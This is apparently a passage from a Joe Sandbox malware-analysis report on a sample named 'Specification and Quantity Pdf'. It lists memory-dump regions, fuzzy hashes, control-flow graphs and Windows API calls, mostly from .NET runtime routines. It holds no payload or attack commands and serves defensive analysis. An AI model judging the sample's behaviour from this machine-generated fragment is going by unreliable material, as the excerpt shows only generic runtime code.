            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3843895f9c51ab2ff60a44597ddfe13e851c997bb974433d0a6811f98037c427
            • Instruction ID: d921069cd1e4f6beae492fffaaae74adb19dc96d4fe3830a2482770add3ea003
            • Opcode Fuzzy Hash: 3843895f9c51ab2ff60a44597ddfe13e851c997bb974433d0a6811f98037c427
            • Instruction Fuzzy Hash: 50F16123D3DB4785F6C1FB64A9512B5F2A2AF95344FD49336E44D312A2EF3D75A08220

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 7ff773c7c9b6-7ff773c7c9bd 1 7ff773c7c9da-7ff773c7ca10 call 7ff773c809b0 0->1 2 7ff773c7c9bf-7ff773c7c9d5 call 7ff773c90c30 0->2 8 7ff773c7ca25-7ff773c7ca37 1->8 9 7ff773c7ca12-7ff773c7ca23 call 7ff773cbac40 1->9 7 7ff773c7d0fd-7ff773c7d120 2->7 11 7ff773c7d127-7ff773c7d12e 7->11 12 7ff773c7d122 call 7ff773c6bdb0 7->12 13 7ff773c7ca3e-7ff773c7ca50 call 7ff773c8adb0 call 7ff773c6e5f0 8->13 14 7ff773c7ca39 call 7ff773c767f0 8->14 9->8 12->11 22 7ff773c7cabc-7ff773c7cb0c call 7ff773c7dfd0 call 7ff773c82370 13->22 23 7ff773c7ca52-7ff773c7ca5c 13->23 14->13 36 7ff773c7cb0e-7ff773c7cb25 call 7ff773c60130 22->36 37 7ff773c7cb2b-7ff773c7cb38 22->37 25 7ff773c7ca5e 23->25 26 7ff773c7cab5 23->26 27 7ff773c7ca60-7ff773c7ca6d 25->27 26->22 29 7ff773c7caa5-7ff773c7cab3 call 7ff773c8d0e0 27->29 30 7ff773c7ca6f-7ff773c7caa0 call 7ff773cbf5b0 27->30 29->26 29->27 30->29 36->37 38 7ff773c7cb3a-7ff773c7cb44 37->38 39 7ff773c7cb57-7ff773c7cb5a 37->39 38->39 41 7ff773c7cb46-7ff773c7cb4e 38->41 42 7ff773c7cb5c 39->42 43 7ff773c7cb63-7ff773c7cb79 call 7ff773c52c80 39->43 41->39 45 7ff773c7cb50 41->45 42->43 48 7ff773c7cb7b-7ff773c7cb83 43->48 49 7ff773c7cbe6-7ff773c7cc18 call 7ff773c5c0a0 call 7ff773c7a330 call 7ff773c77e30 call 7ff773c626e0 43->49 45->39 48->49 50 7ff773c7cb85-7ff773c7cb8c 48->50 62 7ff773c7cc2b-7ff773c7cc37 call 7ff773c626e0 49->62 63 7ff773c7cc1a-7ff773c7cc21 call 7ff773c626e0 49->63 50->49 52 7ff773c7cb8e-7ff773c7cb95 50->52 52->49 55 7ff773c7cb97-7ff773c7cba4 52->55 55->49 57 7ff773c7cba6-7ff773c7cbdf 55->57 57->49 69 7ff773c7cc3d-7ff773c7ccbb EnterCriticalSection 62->69 70 7ff773c7d0c7 call 7ff773c7d130 62->70 63->62 68 7ff773c7cc23-7ff773c7cc26 call 7ff773c91200 63->68 68->62 73 7ff773c7cd1e-7ff773c7cd25 LeaveCriticalSection 69->73 74 7ff773c7ccbd-7ff773c7ccc4 69->74 76 7ff773c7d0cc-7ff773c7d0f6 GetTickCount64 70->76 77 7ff773c7cd2a-7ff773c7cd4c 73->77 74->73 75 7ff773c7ccc6-7ff773c7ccea call 7ff773c5bc10 74->75 75->73 84 7ff773c7ccec-7ff773c7cd01 LeaveCriticalSection 75->84 76->7 79 7ff773c7cf66-7ff773c7cf77 77->79 80 7ff773c7cd52-7ff773c7cd59 77->80 82 7ff773c7cf7d-7ff773c7cf8c 79->82 83 7ff773c7cd60-7ff773c7cd66 80->83 82->70 85 7ff773c7cf92-7ff773c7cf99 82->85 86 7ff773c7cd6c-7ff773c7cd76 83->86 87 7ff773c7ce59-7ff773c7ce63 83->87 84->77 88 7ff773c7cd03-7ff773c7cd0c 84->88 90 7ff773c7cfa0-7ff773c7cff0 85->90 91 7ff773c7cd99-7ff773c7cd9c 86->91 92 7ff773c7cd78 86->92 87->83 89 7ff773c7ce69-7ff773c7cee5 call 7ff773c5c570 87->89 88->77 95 7ff773c7cd0e-7ff773c7cd1c call 7ff773c5bf70 88->95 107 7ff773c7cf0d-7ff773c7cf17 89->107 108 7ff773c7cee7-7ff773c7ceea 89->108 90->90 97 7ff773c7cff2-7ff773c7d02f 90->97 91->87 94 7ff773c7cda2-7ff773c7cda8 91->94 93 7ff773c7cd80-7ff773c7cd87 92->93 93->87 98 7ff773c7cd8d-7ff773c7cd97 93->98 99 7ff773c7cdae-7ff773c7cdb5 94->99 100 7ff773c7ce4c-7ff773c7ce53 94->100 95->77 97->76 103 7ff773c7d035-7ff773c7d0c5 call 7ff773c7d130 call 7ff773c79980 97->103 98->91 98->93 104 7ff773c7cdb7-7ff773c7cdc8 99->104 105 7ff773c7ce1f-7ff773c7ce31 call 7ff773c74020 99->105 100->87 100->94 103->76 114 7ff773c7cdca-7ff773c7cdd1 104->114 115 7ff773c7cdf3 104->115 105->79 128 7ff773c7ce37-7ff773c7ce3d 105->128 110 7ff773c7cf19-7ff773c7cf24 107->110 111 7ff773c7cf26-7ff773c7cf51 call 7ff773c80950 call 7ff773c7a330 107->111 116 7ff773c7cef1-7ff773c7cef4 108->116 117 7ff773c7cf56-7ff773c7cf5d 110->117 111->117 121 7ff773c7cdee-7ff773c7cdf1 114->121 122 7ff773c7cdd3-7ff773c7cde1 call 7ff773c74020 114->122 124 7ff773c7cdf6-7ff773c7ce0f call 7ff773c74020 115->124 116->107 125 7ff773c7cef6-7ff773c7cf0b 116->125 117->82 129 7ff773c7cf5f-7ff773c7cf64 call 7ff773c79980 117->129 121->115 121->124 122->79 140 7ff773c7cde7-7ff773c7cdec 122->140 124->79 138 7ff773c7ce15-7ff773c7ce1d 124->138 125->107 125->116 133 7ff773c7ce44-7ff773c7ce48 128->133 134 7ff773c7ce3f 128->134 129->82 133->100 134->133 138->100 140->100
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID: .NET BGC$BEGIN$condemned generation num: %d$m$qX
            • API String ID: 0-2393834873
            • Opcode ID: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
            • Instruction ID: 485450ceca088c11425e8e9aae316166804191361c339ff7621b5c586391d5ae
            • Opcode Fuzzy Hash: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
            • Instruction Fuzzy Hash: CA225E23D3C68781F691BBA8A8402B4F7A0FF54755F849236D98C732A1DF3CB5A58360

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
            • String ID: @$@$@
            • API String ID: 2645093340-1177533131
            • Opcode ID: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
            • Instruction ID: ec6e5b953ef1b336679daa52cef43ad403cd688eb006e1aadf94f233e1643002
            • Opcode Fuzzy Hash: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
            • Instruction Fuzzy Hash: C941723272CAC1C6EBA1DF51E4543AAB3A0FB48B94F844235DAAD53B88CF3DD4458B10

            Control-flow Graph

            APIs
            • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF773C5474F,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C5B82B
              • Part of subcall function 00007FF773C61460: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C6146F
              • Part of subcall function 00007FF773C61460: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614AD
              • Part of subcall function 00007FF773C61460: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614D9
              • Part of subcall function 00007FF773C61460: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614EA
              • Part of subcall function 00007FF773C61460: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614F9
            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF773C5474F,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C5B89D
            • GetProcessAffinityMask.KERNEL32 ref: 00007FF773C5B8B0
            • QueryInformationJobObject.KERNEL32 ref: 00007FF773C5B8FE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
            • String ID: PROCESSOR_COUNT
            • API String ID: 1701933505-4048346908
            • Opcode ID: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
            • Instruction ID: 39dc2bd8f916452c4822a990713b414842d6795bcf1d424073253428b46bb40e
            • Opcode Fuzzy Hash: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
            • Instruction Fuzzy Hash: B6317363B3CA4386EB94BB90D4802B9E7A1EF44798FD41036D68D666D5DF2CE409C760

            Control-flow Graph

            APIs
              • Part of subcall function 00007FF773C5B820: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF773C5474F,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C5B82B
              • Part of subcall function 00007FF773C5B820: QueryInformationJobObject.KERNEL32 ref: 00007FF773C5B8FE
              • Part of subcall function 00007FF773C5B6C0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF773C54778,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C5B6D1
            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C548BE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: AllocExceptionFailFastHandleInformationModuleObjectQueryRaise
            • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
            • API String ID: 3403879507-2841289747
            • Opcode ID: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
            • Instruction ID: e0bcb563fa14f080c14f61cf2ffc4e97c8d221a3b0f3471ecc44d960a1fe1b8f
            • Opcode Fuzzy Hash: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
            • Instruction Fuzzy Hash: 85414B23B3C69681E6C1BB61A8026B9A391AF51784FE84072E94D7B6D6CF2CF415C721

            Control-flow Graph

            APIs
            Strings
            • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF773C555E6
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: ExceptionFailFastRaise$Sleep
            • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
            • API String ID: 3706814929-926682358
            • Opcode ID: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
            • Instruction ID: 474919a51fc7674c2d61abcf4138c30d766359b1d1f153d26206b33bdab320c6
            • Opcode Fuzzy Hash: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
            • Instruction Fuzzy Hash: 50411A77A39A4286EBD1BF19E440379B3A1EB44784FE44036EA4E623E0DF3DE5518760

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Thread$CloseCreateHandlePriorityResume
            • String ID:
            • API String ID: 3633986771-0
            • Opcode ID: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
            • Instruction ID: ae82fe34af2857e42926035cb9f85358eaf3ff1bad6bd4b97d9bbc10bba5d4b2
            • Opcode Fuzzy Hash: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
            • Instruction Fuzzy Hash: 1FE065E6E39B0182EB54ABA1A814335A3507F99BD9F885034CDAE16360EF3C91998610

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 578 7ff773c60e30-7ff773c60e61 579 7ff773c60e67-7ff773c60e82 GetCurrentProcess call 7ff773cba95e 578->579 580 7ff773c60f1f-7ff773c60f3c GlobalMemoryStatusEx 578->580 579->580 591 7ff773c60e88-7ff773c60e90 579->591 582 7ff773c60fc2-7ff773c60fc5 580->582 583 7ff773c60f42-7ff773c60f45 580->583 587 7ff773c60fce-7ff773c60fd1 582->587 588 7ff773c60fc7-7ff773c60fcb 582->588 585 7ff773c60f47-7ff773c60f52 583->585 586 7ff773c60fb1-7ff773c60fb4 583->586 592 7ff773c60f5b-7ff773c60f6c 585->592 593 7ff773c60f54-7ff773c60f59 585->593 594 7ff773c60fb9-7ff773c60fbc 586->594 595 7ff773c60fb6 586->595 589 7ff773c60fdb-7ff773c60fde 587->589 590 7ff773c60fd3-7ff773c60fd8 587->590 588->587 596 7ff773c60fe8-7ff773c6100b call 7ff773cbacf0 589->596 597 7ff773c60fe0 589->597 590->589 598 7ff773c60efa-7ff773c60eff 591->598 599 7ff773c60e92-7ff773c60e98 591->599 600 7ff773c60f70-7ff773c60f81 592->600 593->600 594->596 601 7ff773c60fbe-7ff773c60fc0 594->601 595->594 602 7ff773c60fe5 597->602 608 7ff773c60f11-7ff773c60f14 598->608 609 7ff773c60f01-7ff773c60f04 598->609 603 7ff773c60e9a-7ff773c60e9f 599->603 604 7ff773c60ea1-7ff773c60eb5 599->604 606 7ff773c60f8a-7ff773c60f9e 600->606 607 7ff773c60f83-7ff773c60f88 600->607 601->602 602->596 610 7ff773c60eb9-7ff773c60eca 603->610 604->610 612 7ff773c60fa2-7ff773c60fae 606->612 607->612 608->596 615 7ff773c60f1a 608->615 613 7ff773c60f0b-7ff773c60f0e 609->613 614 7ff773c60f06-7ff773c60f09 609->614 616 7ff773c60ecc-7ff773c60ed1 610->616 617 7ff773c60ed3-7ff773c60ee7 610->617 612->586 613->608 614->608 615->602 618 7ff773c60eeb-7ff773c60ef7 616->618 617->618 618->598
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CurrentGlobalMemoryProcessStatus
            • String ID: @
            • API String ID: 3261791682-2766056989
            • Opcode ID: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
            • Instruction ID: 8727b1e25667a36421b8e91ef39160ad6aed7000b8794b8b81bf820907b85c49
            • Opcode Fuzzy Hash: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
            • Instruction Fuzzy Hash: A9411423B3DB2681F9D6DA369510339D296AF49BC4F48C231E94E32784FF3CE4818612

            Control-flow Graph

            APIs
            • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF773C7F9D9,?,?,?,?,?,00007FF773C8E9FF,?,?,?,00007FF773C688C3), ref: 00007FF773C92360
            • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF773C7F9D9,?,?,?,?,?,00007FF773C8E9FF,?,?,?,00007FF773C688C3), ref: 00007FF773C923D6
            • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF773C7F9D9,?,?,?,?,?,00007FF773C8E9FF,?,?,?,00007FF773C688C3), ref: 00007FF773C9242B
            • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF773C7F9D9,?,?,?,?,?,00007FF773C8E9FF,?,?,?,00007FF773C688C3), ref: 00007FF773C92451
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
            • Instruction ID: 84b00d6dfab54f9fcbd9111db25b7e63748f77570db79cdbfc6cd5445c612cad
            • Opcode Fuzzy Hash: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
            • Instruction Fuzzy Hash: BD315823E3C61A81EAA0BB55E8803B9B258BF54744FD60136D9CD672D1AF3CE49183B1

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF773C651C8,?,?,0000000A,00007FF773C64220,?,?,00000000,00007FF773C5DBB1), ref: 00007FF773C61707
            • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF773C651C8,?,?,0000000A,00007FF773C64220,?,?,00000000,00007FF773C5DBB1), ref: 00007FF773C61727
            • VirtualAllocExNuma.KERNEL32 ref: 00007FF773C61748
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: AllocVirtual$CurrentNumaProcess
            • String ID:
            • API String ID: 647533253-0
            • Opcode ID: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
            • Instruction ID: e9d4f187fd5553a36860d2e20705ae4a892a082d715808736dfb383d97d8103f
            • Opcode Fuzzy Hash: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
            • Instruction Fuzzy Hash: 46F0AFB2B286D1C2EB609B06F400219A760AB49BD9F884138EF9C27B58CF3DD5818B10

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Count64Tick
            • String ID:
            • API String ID: 1927824332-0
            • Opcode ID: e77201ca6bf2b5c6eab2984a94a29268fc8629bbea3a1e3fd04f15228a9aecdf
            • Instruction ID: 67899a9ebf5fb4be3504640e38cd748767db2b75b1ba551cc96734b17de5db07
            • Opcode Fuzzy Hash: e77201ca6bf2b5c6eab2984a94a29268fc8629bbea3a1e3fd04f15228a9aecdf
            • Instruction Fuzzy Hash: 8F418C33E3C642C1FAE4BBA49956279F391AF00788F958832C94D237E1DF3DE4418620

            Control-flow Graph

            APIs
